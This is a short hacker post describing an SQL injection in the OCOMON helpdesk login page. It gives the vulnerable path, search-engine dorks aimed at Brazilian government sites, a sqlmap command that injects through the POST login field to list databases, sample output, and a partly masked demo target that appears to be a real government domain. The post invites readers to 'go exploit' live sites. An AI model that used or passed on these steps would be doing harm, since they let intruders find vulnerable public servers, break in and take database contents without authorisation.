~ OCOMON Sql Injection Vulnerable: ~
%[JonatasFil DKR]%
- OCOMON are vulnerable to Bypass Sqli,
{https://cxsecurity.com/issue/WLB-2016080175}
- And recently discovered a method of doing sqli injection via post using sqlmap.
------------------------------------------------------
[+] Vuln Directory: /ocomon/includes/common/login.php
------------------------------------------------------
- Ok, First you have to find out if the site has the file login.php and it is vuln.
------------------------------------------------------------------------------------
[+] Dork:inurl:"ocomon" site:gov.br
[+] Dork:inurl:"ocomon" site:br
-----------------------------------------------------
- After finding a site with the system vulnerable:
-----------------------
[+] Download Sqlmap:
[+] http://sqlmap.org/
-----------------------
- and go exploit.
------------------------------------------------------------------------------------
[XPL] "sqlmap -u http://www.{site}/ocomon/includes/common/login.php --data"=login=" --dbs --random-agent"
-------------------------------------------------------------------------------------
- After that just list the tables.
-------------------------
available databases [7]:
[*] emater
[*] forum
[*] information_schema
[*] mysql
[*] ocomon_rc6
[*] phpmyadmin
[*] wordpress
---------------------------
[+] DEMO: wwXw.emaXter.pXa.goXv.bXr
~ Enjoy :D